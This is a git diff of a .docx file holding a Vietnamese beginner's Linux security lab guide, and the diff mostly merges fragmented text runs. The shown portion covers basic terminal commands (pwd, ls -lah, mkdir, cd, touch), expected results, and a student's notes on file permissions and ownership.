--- a/Linux/Linux_Security_Lab_Detailed.docx
+++ b/Linux/Linux_Security_Lab_Detailed.docx
@@ -1,150 +1,18 @@
 
 <file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
-<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se wp14">
+<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
   <w:body>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:r>
-        <w:t>Linux + Security LAB - Hư</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ớ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ng D</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ẫ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>n Chi Ti</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ế</w:t>
-      </w:r>
-      <w:r>
-        <w:t>t</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Tài li</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ệ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>u này hư</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ớ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ng d</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ẫ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>n t</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ừ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ng bư</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ớ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>c th</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ự</w:t>
-      </w:r>
-      <w:r>
-        <w:t>c hành LAB Linux + Security cho ngư</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ờ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>i m</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ớ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>i. M</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ỗ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>i LAB g</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ồ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>m m</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ụ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>c tiêu, cách d</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ự</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ng, command c</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ầ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>n ch</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ạ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>y, k</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ế</w:t>
-      </w:r>
-      <w:r>
-        <w:t>t qu</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ả</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> mong đ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ợ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>i và ph</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ầ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>n t</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ự</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> phân tích.</w:t>
+        <w:t>Linux + Security LAB - Hướng Dẫn Chi Tiết</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Tài liệu này hướng dẫn từng bước thực hành LAB Linux + Security cho người mới. Mỗi LAB gồm mục tiêu, cách dựng, command cần chạy, kết quả mong đợi và phần tự phân tích.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -157,55 +25,16 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>M</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ụ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>c tiêu:</w:t>
+        <w:t>Mục tiêu:</w:t>
       </w:r>
       <w:r>
         <w:br/>
-        <w:t>Bi</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ế</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">t </w:t>
-      </w:r>
-      <w:r>
-        <w:t>dùng terminal Linux cơ b</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ả</w:t>
-      </w:r>
-      <w:r>
-        <w:t>n</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Các bư</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ớ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>c th</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ự</w:t>
-      </w:r>
-      <w:r>
-        <w:t>c hi</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ệ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>n:</w:t>
+        <w:t>Biết dùng terminal Linux cơ bản</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Các bước thực hiện:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -213,19 +42,7 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Bư</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ớ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>c 1: M</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ở</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> terminal</w:t>
+        <w:t>Bước 1: Mở terminal</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -238,37 +55,7 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Bư</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ớ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>c 2: Ki</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ể</w:t>
-      </w:r>
-      <w:r>
-        <w:t>m tra thư m</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ụ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>c hi</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ệ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>n t</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ạ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>i</w:t>
+        <w:t>Bước 2: Kiểm tra thư mục hiện tại</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -281,19 +68,7 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Bư</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ớ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>c 3: Xem file/thư m</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ụ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>c</w:t>
+        <w:t>Bước 3: Xem file/thư mục</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -303,14 +78,15 @@
       <w:r>
         <w:t>–</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>lah</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30AD5BC9" wp14:editId="0B59F3D1">
             <wp:extent cx="5486400" cy="3696970"/>
@@ -353,25 +129,7 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Bư</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ớ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>c 4: T</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ạ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>o thư m</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ụ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>c lab</w:t>
+        <w:t>Bước 4: Tạo thư mục lab</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -385,19 +143,7 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Bư</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ớ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>c 5: Đi vào thư m</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ụ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>c</w:t>
+        <w:t>Bước 5: Đi vào thư mục</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -410,27 +156,12 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Bư</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ớ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>c 6: T</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ạ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>o file test</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>touch</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> test.txt</w:t>
+        <w:t>Bước 6: Tạo file test</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>touch test.txt</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -438,25 +169,7 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Bư</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ớ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>c 7: Ki</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ể</w:t>
-      </w:r>
-      <w:r>
-        <w:t>m tra l</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ạ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>i</w:t>
+        <w:t>Bước 7: Kiểm tra lại</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -466,14 +179,15 @@
       <w:r>
         <w:t>–</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>lah</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08042B34" wp14:editId="6DC18DC9">
             <wp:extent cx="4791744" cy="1086002"/>
@@ -513,25 +227,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>K</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ế</w:t>
-      </w:r>
-      <w:r>
-        <w:t>t qu</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ả</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> mong đ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ợ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>i:</w:t>
+        <w:t>Kết quả mong đợi:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -539,19 +235,7 @@
         <w:pStyle w:val="ListBullet"/>
       </w:pPr>
       <w:r>
-        <w:t>Th</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ấ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>y thư m</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ụ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>c linux_lab</w:t>
+        <w:t>Thấy thư mục linux_lab</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -559,13 +243,7 @@
         <w:pStyle w:val="ListBullet"/>
       </w:pPr>
       <w:r>
-        <w:t>Th</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ấ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>y file test.txt</w:t>
+        <w:t>Thấy file test.txt</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -573,13 +251,7 @@
         <w:pStyle w:val="ListBullet"/>
       </w:pPr>
       <w:r>
-        <w:t>Hi</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ể</w:t>
-      </w:r>
-      <w:r>
-        <w:t>u pwd và cd</w:t>
+        <w:t>Hiểu pwd và cd</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -589,1054 +261,45 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">- Command </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nào</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>quan</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tr</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ọ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ng</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nh</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ấ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>t</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Câu</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>lệnh</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>chú</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> ý </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nhất</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>là</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> ls –</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>lah</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nó</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>kiểm</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tra</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>các</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>thao</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tác</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>còn</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>lại</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>đã</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>hoàn</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>thành</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>chưa</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>đồng</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>thời</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">  </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>có</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>cái</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nhìn</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>toàn</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>cảnh</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>về</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>hệ</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>thống</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>mắt</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>thường</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>không</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>thể</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>thấy</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>- Command nào quan trọng nhất?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Câu lệnh chú ý nhất là ls –lah, nó kiểm tra các thao tác còn lại đã hoàn thành chưa đồng thời  có cái nhìn toàn cảnh về hệ thống mắt thường không thể thấy</w:t>
+      </w:r>
       <w:r>
         <w:br/>
-        <w:t xml:space="preserve">- Output </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nào</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>c</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ầ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>n</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>chú</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> ý?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Output </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>cần</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>chú</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> ý </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>là</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>chuỗi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>phân</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>quyền</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>và</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>chủ</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sở</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>hữu</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">.  </w:t>
+        <w:t>- Output nào cần chú ý?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Output cần chú ý là chuỗi phân quyền và chủ sở hữu.  </w:t>
       </w:r>
       <w:r>
         <w:br/>
-        <w:t xml:space="preserve">- </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Có</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>r</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ủ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>i</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ro</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>b</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ả</w:t>
-      </w:r>
-      <w:r>
-        <w:t>o</w:t>
